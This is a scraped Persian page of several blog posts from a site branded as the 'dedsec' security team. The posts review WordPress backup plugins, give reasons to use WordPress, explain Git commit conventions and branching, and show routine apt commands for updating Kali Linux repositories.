4- افزونه کامل و قدرتمند BackUpWordPress

پشتیبان گیری backupwordpress

BackUpWordPress یک افزونه‌ی کامل پشتیان‌گیری وردپرس است که از زمانبندی اتوماتیک پشتیبانی می‌کند. این افزونه این امکان را به شما می‌دهد تا زمانبندی‌های مختلفی برای پایگاه داده و فایل‌ها ایجاد کنید. تنها مشکل این افزونه این است که نسخه‌ی رایگان آن، اجازه‌ی ذخیره کردن پشتیبان‌های وردپرس در سرویس cloud storage را نمی‌دهد.

اگر می‌خواهید نسخه‌های پشتیبان را در Dropbox، Google Drive و . ذخیره کنید باید یک برنامه‌ی افزونه‌ی پریمیوم بخرید.

برنامه‌های افزودنی، برای تمام سرویس‌ موجود بوده و می‌توانید برنامه‌ی افزودنی که نیاز دارید و یا کل بسته را خریداری کنید.

5- افزونه انتقال سایت Duplicator

افزونه مهم وردپرس

همانطور که از نام این افزونه پیداست، Duplicator، یکی از افزونه‌های محبوب وردپرس است که برای انتقال سایت‌ها استفاده می‌شود. با این حال ویژگی‌هایی برای پشتیبان‌گیری هم دارد.

این افزونه قابلیت ایجاد زمان‌بندی اتوماتیک برای پشتیبان‌گیری را ندارد بنابراین برای ایجاد نسخه‌ی پشتیبان از سایت وردپرس، خیلی ایده‌آل نیست.

6- WP-DB-Backup یکی از محبوب ترین افزونه‌های پشتیبان گیری

افزونه مهم و محبوب ورد پرس wp-db-backup

WP-DB-Backup با داشتن بیش‌تر از 400000 نصب فعال، یکی از محبوب‌ترین افزونه‌های پشتیبان‌گیری وردپرس است. تنها مشکل این افزونه این است که فقط از پایگاه داده‌ی وردپرس پشتیبان‌گیری می‌کند.

این به این معنی است که باید از فایل‌های چندرسانه‌ای بصورت دستی پشتیبان‌گیری کنید. اگر خیلی سایت را به‌روز رسانی نمی‌کنید یا در آن عکس آپلود نمی‌کنید، می‌توانید از WP-DB-Backup بعنوان پشتیبان‌گیر اصلی وردپرس‌تان استفاده کنید.

پشتیان‌گیری، زمانبندی اتوماتیک پشتیبان‌گیری و بازیابی پایگاه داده با WP-DB-Backup بسیار ساده است. این افزونه برای کابرانی که برای پشتیبان‌گیریِ دستی از پایگاه داده به phpMyAdmin دسترسی ندارند نیز بسیار کارآمد است.

7- افزونه حرفه‌ای VaultPress تیم توسعه وردپرس برای پشتیبان گیری

افزونه حرفه‌ای و فوق العاده vaultpress

این افزونه توسط Matt Mullenweg (بنیان‌گذار وردپرس) و تیمش در automattic ایجاد شده است.

اخیراً این افزونه بخشی از محصولات Automattic به نامِ JetPack شده است. برای استفاده از VaultPress باید یک اشتراکِ JetPack داشته باشید. طرح‌های مختلفی با هزینه‌ها و ویژگی‌های متفاوت وجود دارد.

VaultPress پشتیبان‌گیری خودکارِ Real Time را که از $3.50 در ماه شروع می‌شود ارئه می‌دهد. نصب و راه‌اندازیِ VaultPress و بازیابی نسخه‌‌های پشتیبان فقط با چند کلیک ساده انجام می‌شود. حتی در برخی از پکیج‌های این افزونه، اسکن‌های امنیتی هم وجود دارد.

البته این افزونه معایبی هم دارد. اول این‌که باید هزینه‌ی آن را بصورت دوره‌ای پرداخت کنید و درصورتی‌که چند سایت وردپرس داشته باشید این هزینه افزایش می‌یابد. دوم این‌که باید در JetPack اشتراک داشته باشید، یک حساب کاربری در‌ WordPress.com ایجاد کنید و افزونه‌ی JetPack را روی سایت نصب کنید.

اخیراً در طرح‌های کوچک‌تر پشتیبان‌گیری، نسخه‌های پشتیبان فقط برای مدت 30 روز در آرشیو ذخیره می‌شوند، اگر به آرشیو پشتیبان‌گیری نامحدود نیاز داشته باشید باید برای هر وب سایت، ماهانه $29 هزینه پرداخت کنید که رقم بالایی است.

جمع‌بندی نهایی

هر یک از افزونه‌های پشتیبان‌گیری وردپرس، مزایا و معایب خودشان را دارند. شرکت‌های حرفه‌ای از VaultPress استفاده می‌ کنند چون استفاده از آن بسیار آسان است و از پشتیبان‌گیری‌های Real Time پشتیبانی می‌کند. به عبارت دیگر این افزونه بجای این‌که بصورت روزانه یا ساعتی از تمام فایل‌ها پشتیبان‌گیری کند، فقط از چیزهایی که به روزرسانی شده و تغییر کرده‌اند پشتیبان‌گیری می‌کند. این ویژگی برای سایت‌های بزرگی عالی و ایده‌آل است چون امکان استفاده‌‌ی مفید از منابع سرور را فراهم می‌کند.

به هر حال اگر وب‌سایت شما کوچک یا متوسط است استفاده از افزونه‌ی BackupBuddy به شما پیشنهاد می‌شود چون این افزونه، cloud storage و Stash مخصوص خودش را دارد که باعث می‌شود افراد مبتدی بتوانند به راحتی و تنها با چند کلیک، نسخه‌های پشتیبان را در cloud ذخیره کنند.

در نهایت هر کدام از افزونه‌های پشتیبان‌گیری وردپرس را که انتخاب کردید فرقی نمی‌کند فقط لطفاً نسخه‌های پشتیبان را در همان سروری که سایت شما در آن است، ذخیره نکنید.

انجام این کار مثل این است که تمام تخم‌مرغ‌های‌تان را در یک سبد بگذارید. اگر سخت‌افزار سرور با خطا مواجه شود یا حتی بدتر، اگر سور هک شود، هیچ نسخه‌ی پشتیبانی نخواهید داشت و این باعث شکستِ هدفِ انجام پشتیبان‌گیری‌های دوره‌ای می‌شود.

به این دلیل شدیداً توصیه می‌کنیم که نسخه‌های پشتیبان را در یک سرویس ذخیره‌سازیِ third-party مثلِ Google Drive و یا DropBox ذخیره کنید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

چرا باید از وردپرس استفاده کنید؟

اغلب مبتدی‌ها این سوال‌ها را می‌پرسند که از چه سیستم مدیریت محتوایی استفاده کنند. در این مطلب قصد داریم دلایل استفاده از ورد پرس را برایتان بازگو کنیم.

اغلب اشتباه می‌کنند و وردپرس را در دسته‌ی پلت‌فرمِ وبلاگ‌نویسی قرار می‌دهند. هر چند که در گذشته این موضوع صحت داشته ولی چندین سال است که وردپرس تبدیل به یک سیستم مدیریت محتوای چندکاره (CMS) شده است. درحالی‌‌که هنوز هم می‌توانید برای ایجاد وبلاگ‌های ساده از وردپرس استفاده کنید، اما وردپرس این امکان را به شما می‌دهد تا بتوانید وب‌سایت‌ها و برنامه‌های موبایل کاملا کاربردی هم ایجاد کنید.

بهترین نکته‌ی وردپرس این است که استفاده از آن آسان است و برای همه ‌چیز به اندازه‌ی کافی انعطاف‌پذیری دارد. این موضوع دلیل اصلی افزایش شهرت و محبوبیت وردپرس است و هیچ سیستم مدیریت محتوایی به اندازه وردپرس طرفدار ندارد.

با توجه به ویژگی‌های قدرتمند وردپرس، بسیاری از برندهای معتبر برای وب‌سایت‌هایشان از وردپرس استفاده می‌کنند: مجله‌ی Times، Google، Facebook، Sony، Disney، LinkedIn، The New York Times، CNN، eBay و . .

در ادامه دلایل استفاده از وردپرس را بررسی می‌کنیم.

وردپرس رایگان است

وردپرس یک نرم‌افزار رایگان است، به این معنی که می‌توانید بصورت رایگان آن را دانلود و نصب کرده و از آن استفاده کنید و آن را تغییر دهید. می‌توانید از وردپرس برای ایجاد هر نوع وب‌سایتی استفاده کنید. وردپرس، سورس‌باز هم هست، به این معنی که سورس‌کد نرم‌افزار در دسترس همه قرار دارد و افراد می‌تواند آن را بررسی کرده، تغییر دهند و با آن بازی کنند.

در حال حاضر بیش از 2600 تِم یا قالب و بیش از 31000 افزونه‌ی رایگان برای وردپرس وجود دارد و می‌توانید آن‌ها را دانلود و نصب کرده و در هر وب‌سایتی از آن‌ها استفاده کنید. برای اجرای وردپرس تنها چیزی که نیاز دارید، دامنه و هاست است.

با توجه به ماهیت سوس‌باز بودن، وردپرس یک نرم‌افزار عمومی است. این نرم‌افزار توسط گروه بزرگی از داوطلبانی نگه‌داری می‌شود که بیش‌تر آن‌ها مشاوران وردپرس هستند و به رشد و نگه‌داری وردپرس علاقه‌مند هستند. هر کسی می‌تواند با نوشتن پَچ‌ها (patches)، پاسخ دادن به سوالات پشتیبانی، نوشتن افزونه‌ها، ایجاد تم‌ها، ترجمه‌ی وردپرس و به‌روز رسانی داکیومنت‌ها، به نگه‌داری وردپرس کمک کند.

با استفاده کردن از وردپرس به بخشی از جامعه‌ی بی‌نظیر وردپرس خواهید پیوست. در این جامعه، از اعضا پشتیبانی‌های رایگان دریافت می‌کنید، افزونه و قالب‌های رایگان دانلود می‌کنید و حتی می‌توانید بعد از کسب تجربه در وردپرس، به جامعه کمک هم بکنید.

یادگیری و استفاده از وردپرس آسان است

یادگیری وردپرس

میلیون‌ها نفر از وردپرس استفاده می‌کنند و تقریباً هر روز افراد جدیدی با ایجاد اولین وب‌سایت‌های وردپرسی‌شان، به جامعه‌ی وردپرس می‌پیوندند. دلیل این‌که مردم به سرعت با وردپرس سازگار می‌شوند این است که استفاده از آن نسبتاً آسان است.

اگر در پیاده سازی سایت وردپرسی خود با مشکل مواجه شدید به راحتی در اینترنت جستجو کنید و راه حل مشکل خود را بیابید. آموزش‌های نامحدودی نیز برای ورد پرس وجود دارد.

وردپرس با استفاده از تم‌ها و افزونه‌ها، توسعه‌پذیر است

افزونه‌ها و قالب‌های وردپرس

بیش‌تر کسانی که از وردپرس استفاده می‌کنند، طراح وب یا برنامه‌نویس نیستند. در واقع بیش‌تر مردم بدون داشتن هیچ دانش اولیه‌ای از طراحی سایت، کار با وردپرس را شروع می‌کنند.

دلیل ایده‌آل بودن وردپرس این است که صدها قالب برای وردپرس وجود دارد که می‌توانید انتخاب کنید، بنابراین می‌توانید هر ظاهری که بخواهید به وب‌سایت بدهید. تقریباً هر نوع قالبی که بخواهید وجود دارد مانند قالب عکاسی، مجله‌ای، تجارت الکترونیک و آموزشی. تقریبا برای هر سلیقه‌ای قالب بی نظیر می‌توانید بیابید.

تغییر قالب‌های وردپرس بسیار آسان است چون قالب‌های زیادی با پنلِ آپشن‌های مخصوص وجود دارند که این امکان را به شما می‌دهند تا بتوانید رنگ، لوگو، و پس‌زمینه را تغییر دهید، اسلایدرهای زیبا ایجاد کنید و بدون نوشتن کد کارهای جالبی با وب‌سایت انجام دهید.

وردپرس فوق‌العاده انعطاف‌پذیر است و با استفاه از افزونه‌ها قابل توسعه است. مثل قالب‌ها، هزاران افزونه‌ی ارزشمند و رایگان هم برای استفاده در دسترس هستند. این افزونه‌ها نه تنها می‌توانند عملکردهای اضافی به وردپرس اضافه کنند، بلکه پلاگین‌های زیادی وجود دارند که می‌توانند به سایت ورپرس یک پلت‌فرم کاملاً جدید اضافه کنند.

وردپرس برای موتورهای جستجو ایده آل است

وردپرس و سئو

وردپرس ساختار استانداردی دارد که برای موتورهای جستجو بسیار محبوب است. اگر از وردپرس استفاده کنید موتورهای جستجو بهتر می‌توانند به ساختار صفحات شما دسترسی داشته باشند.

علاوه بر این افزونه‌های خیلی خوبی وجود دارد که با اضافه کردن آن‌ها به ورد پرس می‌توانید به نتایج خوبی در زمینه سئو برسید.

مدیریت وردپرس آسان است

مدیریت وردپرس

انتشار مطالب، اضافه کردن فایل، مدیریت کاربران و بروز رسانی سیستم wordpress بسیار آسان است. در ورد پرس بسیار راحت می‌توانید هر کاری را که برای مدیریت یک وب سایت به آن نیاز دارید انجام دهید.

وردپرس با ابزارهای هوشمند بروز رسانی می‌تواند سیستم شما را به صورت خودکار و همیشه بروز نگاه دارد.

وردپرس امن و مطمئن است

امنیت وردپرس

وردپرس با درنظر گرفتن امنیت، طراحی شده و توسعه یافته، بنابراین برای اجرای هر وب‌سایتی کاملاً امن و مطمئن است. با این وجود اینترنت هم مثل دنیای واقعی مکانی غیر قابل پیش‌بینی است.

مان زیادی هستند که سعی می‌کنند تا جایی که می‌توانند به سایت‌ها نفوذ کنند. غیر از تمهیدات امنیتی درونی ورد پرس می‌توانید از افزونه‌ها و پلاگین‌های پیشرفته نیز برای بهبود بخشیدن امنیت وردپرس استفاده کنید.

وردپرس انواع مختلفی از رسانه‌ها را مدیریت می‌کند

مالتیمدیا و رسانه‌ها در وردپرس

با وردپرس فقط محدود به نوشتن متن نیستید. وردپرس بصورت داخلی از هَندِل کردن محتواهای تصویری، صوتی و ویدیویی پشتیبانی می‌کند. می‌توانید در وردپرس فایل‌ها و اسناد را هم مدیریت کنید.

وردپرس از وب‌سایت‌هایی که oEmbed فعال دارند پشتیبانی می‌کند، این به این معنی است که می‌توانید ویدیوهای یوتیوب، عکس‌های اینستاگرام، توییت‌ها و صوت‌های Souncloud را تنها با paste کردن URL آن‌ها در پست‌های‌تان اضافه کنید. حتی می‌توانید به بازدیدکننده‌های خود امکان اضافه کردن ویدیو از Youtube را بدهید.

کاربردهای وردپرس

چرا وردپرس را انتخاب کنیم

تقریبا با وردپرس هر کاری می‌توانید بکنید. بخشی از کاربردهای یک سایت وردپرسی عبارتند از:

وبلاگ
سایت خدماتی و آموزشی
سایت بازی‌های آنلاین
گالری فیلم و یا عکس
وب سایت‌های رتبه بندی
فروشگاه ها
سایت‌های هنری
انجمن
و.

توجه داشته باشید که موارد بالا فقط برخی از موارد استفاده‌ی وردپرس هستند.

امیدواریم این مقاله به سوال‌های شما راجع به دلیل استفاده از وردپرس، پاسخ داده باشد. بهترین روش تجربه‌ی قدرت واقعی وردپرس، استفاده از آن است. استفاده از وردپرس را امتحان کنید و نظرتان را راجع به آن با ما درمیان بگذارید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش Git و پیام Commit

آموزش Git از دستورات تا مدل شاخه بندی و پیام Commit

در این پست قصد داریم تا ابزار محبوب سیستم کنترل ورژن، Git و اصول استفاده از آن را بیان کنیم. اکثر ما به شرایطی برخوده ایم که نیاز به دانستن تاریخچه تغییرات داشته ایم تا بتوانیم به راحتی پروسه و گام های خود را بررسی کنیم یا تغییراتی را به عقب بازگردانیم. داشتن تغییرات در کارهای گروهی نیز دارای اهمیت بسیاری است.

با اینکه ابزار Git بیشتر از همه چیز در توسعه کد استفاده شده اما نباید از این نکته غافل شد که این ابزار برای مدیریت ورژن *فایل ها* ساخته شده است و نه تنها کد، بلکه هر فایلی حتی عکس را نیز میتوان ورژن بندی کرد.

امروزه ابزار Git برای توسعه دهندگان و برنامه نویسان ضرورت بسیاری دارد. ورژن بندی نرم افزار دارای اهمیت زیادی است چرا که در مدیریت روند توسعه نرم افزار تأثیر مستقیمی می گذارد. اگر در پیشنهادات کار برنامه نویسی نگاه کنید همیشه بلد بودن Git یکی از نیازمندی ها است.

ابزار Git چیست؟

همانطور که در بالا گفته شد ابزار Git یک ابزار کنترل ورژن فایل ها است. اما نکته دیگری که وجود دارد غیر متمرکز بودن این ابزار است. در ابزارهای دیگر، تمامی تغییرات در یک سرور مرکزی نگهداری می شود اما در Git، شما تمامی تغییرات را در تمام کپی های

repository خواهید داشت. با این حساب هم یک بکاپ در مخزن محلی یعنی در سیستم افراد تیم قرار خواهد داشت و هم دیگر نیازی به یک سرور مرکزی نیست. هرچند که داشتن یک سرور مرکزی برای اشتراک اطلاعات معمولا نیاز است تا کار را تسریع و هماهنگی را تضمین کند.

ابزار git قابلیت های زیر را در اختیار شما می گذارد:

نگهداری تغییرات به همراه توضیح و ثبت کننده آن
بازگردانی به هر نقطه از تغییرات تنها با یک دستور
شاخه بندی کد برای توسعه موازی
ادغام دو شاخه در صورت نیاز
جلوگیری از تداخل ادغام یا همان
merge conflict
نام گذاری با استفاده از tag برای یک تغییر برای دسترسی آسانتر
مشاهده تغییرات فایل ها در ورژن های مختلف آنها با فرمتی مناسب
تولید لاگ متنی از تغییرات که میتوان از آن در ابزارهای دیگر استفاده کرد مانند تولید
CHANGELOG بصورت اتوماتیک

برنامه git برای اولین بار در سال ۲۰۰۵ توسط

Linus Torvalds ساخته شد و در همان سال وظیفه توسعه و نگهداری آن به

Junio Hamano انتقال یافت.

اجزا و اشیاء مختلف Git

برنامه Git چند جزء اساسی دارد که کاربر آن باید بداند و همچنین چند نوع شیء داخلی دارد که دانستن آنها بد نیست.

اجزا از دید کاربر:

Files: فایلها قسمتی هستند که اساسا به خود Git ربطی ندارند اما فایل هایی که در زیر پوشه .git وجود دارند کاملا مربوط به git بوده و کاربر نباید آنها را ویرایش کند. برنامه Git بر اساس فایل هایی که در پوشه .git وجود دارد فایل های شما را ادیت می کند.
Commit: در هر تاریخی تنها نقاطی از آن ثبت و ضبط می شوند و در Git نیز همینطور است. در Git تاریخچه از Commit ها تشکیل شده که هر Commit مانند یک گره یا نقطه می ماند که تغییرات در فایلها، کاربر تغییر دهنده و پیامی از سوی تغییر دهنده به همراه دیگر
meta داده ها نگه می دارد. به هر Commit در پروژه یک Hash Code اختصاص می یابد که با استفاده از آنها میتوانید به Commit خاصی اشاره کنید. با استفاده از این اطلاعات ثبت شده در هر Commit برنامه Git به شما اجازه می دهد که تغییرات را بازگردانی کنید و به آن حالتی که Commit در آن موقع ثبت شد باز گردید.
Branch: شاخه بندی برای مواقعیست که میخواهیم تغییرات را در یک کپسوله ای جدا و یا به صورت موازی انجام دهیم و خطوط توسعه بخش ها را از هم جدا کنیم تا بر روی یکدیگر اثر مستقیم نگذاشته و بتوان آنها را مدیریت کرد. این قابلیت به میزان قابل توجهی بر کیفیت کار موازی تأثیر میگذارد و کل روند توسعه را بهینه می کند. در ادامه در مورد چرخه و استاندارد شاخه بندی توضیح خواهم داد.
Tag: بخاطر سختی حفظ IP ها، نام های دامنه بوجود آمدند. به خاطر سختی به خاطر سپردن Hash های Commit ها نیز Tag ها بوجود آمدند. Tag ها به معنی برچسب هستند و شما میتوانید برای یک Commit برچسبی با اسم دلخواه (بعنوان مثال شماره نسخه) بگذارید تا در مواقع نیاز به راحتی به آن Commit دسترسی پیدا کنید.

چرخه استفاده از ابزار Git

بطور معمول اکثر پروژه ها با یک استارت اولیه شروع شده و بعد از گذراندن مراحلی به پایان میرسند ولی پروژه های نرم افزاری معمولا پایانی ندارند هرچند که از یک نقطه به بعد توسعه میتواند تنها رفع باگ باشد.

قبل از اینکه به مراحل برسیم بهتر است که سه قسمت اصلی ذخیره اطلاعات در Git را بررسی کنیم:

قسمت فایل های اصلی: در این قسمت فایل های مربوط به خود پروژه وجود دارند که توسعه دهنده آنها را می سازد یا ویرایش می کند.
قسمت index بندی: در این قسمت اسم و آدرس فایل های ایجاد شده یا تغییر داده شده توسط توسعه دهنده اضافه می شوند.
قسمت مخزن تغییرات: این قسمت مخزن بوده که اطلاعاتی مانند commit ها و شاخه ها و غیره نگهداری می شوند. وقتی توسعه دهنده Commit را ثبت می کند اطلاعات فایل هایی در قسمت index ثبت شده بودند توسط ابزار git با اطلاعات ثبت شده قبلی مقایسه شده و تمام تغییرات به همراه این Commit ثبت می شوند. از آنجایی که git یک
DVCS می باشد همیشه یک مخزن تغییرات Local یا همان داخلی وجود دارد و می تواند یک یا چند مخزن Remote یا خارجی نیز وجود داشته باشد.

روند استفاده از Git بطور معمول و ساده ترین حالت به شرح زیر می باشد:

ساخت اولیه دایرکتوری پروژه و git init در آن یا گرفتن یک نسخه کپی از یک ریپازیتوری با git clone
ساخت و یا جا به جایی به شاخه یا همان Branch مورد نظر (در مورد نحوه شاخه بندی و یا همان Branching در ادامه صحبت خواهیم کرد)
ساخت و یا ویرایش فایل های مورد نظر برای انجام یک کار و بعد اضافه کردن آنها به Stage Area با استفاده از دستور git add
ثبت نهایی کار با Commit و نوشتن پیغام توضیح تغییرات که منجر به ذخیره تغییرات فایل ها در دایرکتوری .git می شود
در نهایت Push کردن Commit های صورت گرفته به Repository یا منبع خارجی یا اشتراکی در صورت وجود که باعث ثبت شدن تمام Commit ها در آن مخزن میشود.

دستورات پر کاربرد در Git

بعد از تمام این مباحث تئوری میرسیم به مباحث عملی و نحوه استفاده از Git:

کانفیگ و تنظیمات

ساخت یک مخزن، استارت پروژه

کپی یک مخرن کامل از یک سرور

اضافه کردن فایل ها به مرحله Stage

ثبت تغییرات یا همان Commit

مشاهده تغییرات بین دو Branch یا بین فایل های فعلی و آخرین تغییرات ثبت شده

بازگردانی به مراحل قبل

مشاهده وضعیت Stage

حذف یک فایل و ثبت حذف شدن آن در Stage

مشاهده تمامی Commit ها و Commit هایی که شامل تغییرات یک فایل خاص میشوند

بر چسب یا همان Tag زدن بر یک Commit

لیست کردن، ساختن و حذف Branch ها

جابجایی در Branch ها

ترکیب دو Branch

ثبت ریموت سرور برای مخزن لوکال

ارسال تغییرات مخزن لوکال به ریموت

گرفتن تغییرات از مخزن ریموت و ثبت در لوکال

ساختاری برای پیام های Commit با عنوان Conventional Commit

اولین سوالی که امکان دارد برای شما پیش آید این است که چرا پیام های تغییرات باید دارای یک ساختار خاص باشند؟ جواب این سوال درست مانند جواب سوال چرا از git استفاده کنیم ” است. راحتی نگهداری، مرور تغییرات و توسعه تیمی می تواند دلیل آن باشد.

در نظر بگیرید در یک تیم توسعه نقشی را بر عهده دارید (مانند

DevOps یا برنامه نویس ارشد یا بخصوص

Code Audit) اگر هر برنامه نویس به سبک خود پیام Commit بنویسد و از شما خواسته شود از تغییرات CHANGELOG تهیه کنید یا عملکرد برنامه نویس را ارزیابی کنید و یا ایرادهای نگارشی یا باگ لاجیک پیدا کنید، شما چگونه اینکار را انجام خواهید داد بدون داشتن ریز تغییرات، قدم های کوچک و هدف های کوچک توسعه و بخصوص متن پیام تغییرات مناسب که با شفافیت تغییر و دلیل تغییر را برای شما تشریح کند؟

در صورت وجود یک ساختار یکسان و تعریف شده برای پیام های Commit شما به راحتی پیام را درک کرده و می توانید اسکریپتی برای اتومات سازی تهیه CHANGELOG بسازید که بسیار سریع و بهینه است. برای ارزیابی برنامه نویس براحتی هدف تغییر را درک خواهید کرد و تغییرات را نسبت به آن هدف ارزیابی خواهید کرد و این شما را از گمراهی نجات میدهد. این مقوله در تعداد بالا بسیار حیاتی می باشد و برای Code Audition (ارزیابی کد) نیز همانند ارزیابی کارایی برنامه نویس با استفاده از داشتن پیام ساختارمند شفافیت عملکرد تغییرات بالاتر میرود.

در آخر به این نتیجه میرسیم که داشتن یک ساختار یکسان برای پیام های Commit مانند داشتن زبان یکسان برای گفت و گو با دیگر اعضای گروه است. قطعا این مقوله بسیار کار گروهی را راحت تر می کند.

در ادامه به ساختار تعریف شده تحت عنوان Conventional Commit می پردازیم.

مدل ساختار Conventional Commit

مدل ساختار Conventional Commit به شکل زیر است:

<type>[optional scope]: <description>

[optional body]

[optional footer(s)]

اجزای مختلف:

type: به معنی نوع تغییر میباشد. مانند: fix, feat, build, chore, ci, docs, style, refactor و غیره. type به لیست ذکر شده محدود نمی باشد و در صورت وجود نوع بهتر میتوانید از آن استفاده کنید.
scope: این قسمت در پرانتز قرار می گیرد و برای مشخص کردن محدوده تأثیرگذاری می باشد. بعنوان مثال: api, lang, core, util و غیره باشد.
description: توضیح مختصر خطی درباره تغییر اعمال شده. بعنوان مثال: ci: add python3.8 env test
body: در صورت نیاز به توضیحات بیشتر می توانید علاوه بر توضیح خطی ای که در خط اول قرار داده اید, در این قسمت توضیحی تا یک پاراگراف نیز قرار دهید.
footer: نکته ها را در این قسمت میتوانید قرار دهید. مانند ارجاء به یک issue یا یک لینک نمایانگر یک کلمه در توضیحات و یا غیره…

نکته: قسمت های scope و body واگر توجه کرده باشید, سورس اکثر کتابخانه ها و یا برنامه های کاربردی ای که به یک زبان نوشته شده اند دارای ساختار دایرکتوری و فایل هایی با نام footer اختیاری می باشند.

نکته: در جمله قسمت description از فعل حال استفاده کنید بجای فعل گذشته مانند: add بجای added.

در صورت وجود تغییر در api ارائه شده به کاربر یا هر تغییری که دارای backward compatibility صد در صد نمی باشد باید در قسمت footer متن BREAKING CHANGE: به همراه تشریح ناسازگاری رو به روی آن را بنویسید.

در صورت نبود نیاز به تشریح میتوانید از ! بعد از type یا scope نیز به جای توضیحات در footer استفاده کنید.

مثال برای تمامی حالت ها:

feat: allow provided config object to extend other configs

BREAKING CHANGE: `extends` key in config file is now used for extending other config files

1	refactor!: drop support for Node 6

refactor!: drop support for Node 6

BREAKING CHANGE: refactor to use JavaScript features not available in Node 6.

ساختاری مناسب برای شاخه بندی

شاید برای شما سوال پیش آمده باشد که این شاخه بندی که سیستم git در اختیار ما قرار میدهد را باید چگونه استفاده کنیم.

خب اینکه برای چرا ممکن است استفاده کنید را در قسمت اجزاء git گفتیم, از شاخه بندی استفاده میکنیم تا بتوانیم رشته ای از تغییرات را جدا نگه داشته و یا حتی بطور موازی بر روی آنها عملیات انجام دهیم, اما اینکه شکل شاخه بندی در هر پروژه یا شرکت متفاوت باشد یکی از مهمترین اهداف git یعنی برقراری و توسعه git بصورت گروهی را تا حدودی برهم میزند. اگر فردی از شرکتی به شرکت دیگری برود مجبور به یادگیری قوانین و ساختارهای ریزی مانند شاخه بندی میشود. جدا از یادگیری دوباره, رسیدن به یک ساختار مناسب برای توسعه مناسب, پیش گیری از تداخل و غیره میتواند کار سختی باشد.

این مدل یک ساختار generic برای branch بندی رشته تغییرات کد میباشد که بر روی اکثر

codebase ها قابل پیاده سازی است و قوانین ساده ای دارد.

مزایای این ساختار Branch بندی

جلوگیری از merge conflict تا حد ممکن
تقسیم وظایف راحتتر
راحتی کنسل کردن توسعه یک feature بدون هیچگونه تأثیر در دیگر شاخه های توسعه
فراهم سازی توسعه موازی حتی برای scale بالا

شاخه های مختلف این ساختار Branch بندی

این ساختار از دو شاخه اصلی بهره میبرد:

master: در این شاخه تنها release های نهایی قرار میگیرند. تغییرات در این شاخه تنها و تنها از طریق merge شدن شاخه های دیگر رخ خواهد داد.
dev: در این شاخه توسعه اصلی و طبق اهداف اصلی پروژه صورت خواهند گرفت. تمامی تغییرات در دیگر شاخه ها در نهایت با این شاخه merge خواهند شد.
feature branches: شاخه هایی هستند میتوانند اسامی خاص هدف خود را داشته باشند و این اهداف باید خارج از هدف پایه کد منبع باشند. این شاخه از شاخه dev نشئت میگیرند و پس از رسیدن به هدف با شاخه dev ادغام یا همان merge خواهند شد. توسعه این شاخه ها با رسیدن به هدف و merge شدن با شاخه dev اتمام یافته و در صورت نیاز به توسعه بیشتر آن feature شاخه جدیدی باز خواهد شد. نگهداری این شاخه ها پس از اتمام کار غیر ضروری است.
release branches: شاخه های تکمیل و بسته بندی برای release هستند که تنها از از شاخه dev نشئت میگیرند و در آخر به شاخه master و dev ادغام می شوند. در این شاخه عملیات هایی مانند تغییر نسخه در کامنت ها, ساخت ChangeLog و غیره صورت میگیرد. نکته: تغییر فایل های کانفیگ مربوط به پکیج بندی در شاخه dev قرار انجام میشود و نه شاخه ها release.
hotfix branches: این شاخه تنها برای رفع باگ های حیاتی ساخته میشود, از master نشئت میگیرد و در نهایت با dev و master ادغام میشود. یکی از بزرگترین عاملان merge conflict نیز معمولا این شاخه ها هستند.

نکته: نام گذاری شاخه ها کاملا اختیاری است و در این آموزش تنها برای ساده سازی نام گذاری شده اند.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش آپدیت مخازن کالی لینوکس

سلام خدمت تمامی کاربران عزیز سایت تیم امنیتی dedsec

کالی لینوکس (Kali Linux) یکی از معروف ترین سیستم عامل ها در حوزه هک و امنیت میباشد که افراد بسیار زیادی از کالی لینوکس استفاده میکنن و در بین هکر ها و مهندسین امنیت بسیار محبوب است ، یکی از مشکلاتی که بعد از نصب کالی لینوکس برای خیلی از کاربران پیش میاد آپدیت نبودن مخازن کالی لینوکس است ، که شما اگر بخواهید یک ابزاری رو نصب کنید با همچین ارورری روبرو میشید

قطعا این ارورر برای شما هم آشناست که بعد از زدن دستور نصب یک ابزار با همچین ارورری روبرو شدید و از خودتون پرسیدید که چطوری میشه این مشکل رو حل کرد؟ در این مطلب ما میخواهیم به شما طریقه آپدیت مخازن کالی لینوکس رو یاد بدیم پس با ما همراه باشید.

نیازمندی :

داشتن دسترسی root یا استفاده از دستور sudo

مرحله اول :

در مرحله اول قبل از آپدیت کردن لازمه تا مطمئن بشیم مخازن صحیح رو در فایل مخازن کالی لینوکس مون داریم برای اینکار به مسیر /etc/apt/sources.list میریم و فایل رو که باز کردیم باید شامل دو خط زیر باشه

1 2	deb https://http.kali.org/kali kali-rolling main non-free contrib deb-src https://http.kali.org/kali kali-rolling main non-free contrib

نکته: حتما از مخازن رسمی کالی لینوکس استفاده کنید، در غیر این صورت هر مخزن دیگه ای که در لیست وارد کنید ممکنه سیستمون رو break کنه و یا در خطر قرارش بده

مرحله دوم :

برای آپدیت کردن کالی لینوکس در مرحله اول باید package index list رو آپدیت کنید و برای اینکار از دستور زیر استفاده میکنیم

1	sudo apt update

در مرحله بعدی (این مرحله اختیاری هست) میتونیم با دستور زیر لیست پکیج هایی که برای Update زمان بندی شدن رو ببینیم

1	apt list --upgradable

در این مرحله از کارمون میتونیم هر پکیج ای که بخوایم رو به کمک دستور apt install PACKAGE-NAME آپگرید کنیم و یا کل پکیج هارو با دستور زیر آپگرید کنیم

1	sudo apt upgrade

تمام ! کالی لینوکس شما الان به طور کامل upgrade شده

مرحله سوم :

در مرحله قبلی ممکنه که بخاطر تغییر وابستگی پکیج ها، تعدادی از پکیج ها به درستی آپگرید نشده باشند و پیغامی در انتهای آپگرید در مرحله قبلی مشاهده کرده باشید برای حل این مشکل میتونید تمامی این پکیج هارو به صورت تک به تک به صورت جدا با دستور apt install PACKAGE-NAME آپگرید کنید و یا تمامی این پکیج هارو به صورت یکجا با دستور زیر آپگرید کنید

1	sudo apt dist-upgrade

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

ای پی های فعال شبکه را پیدا کنید

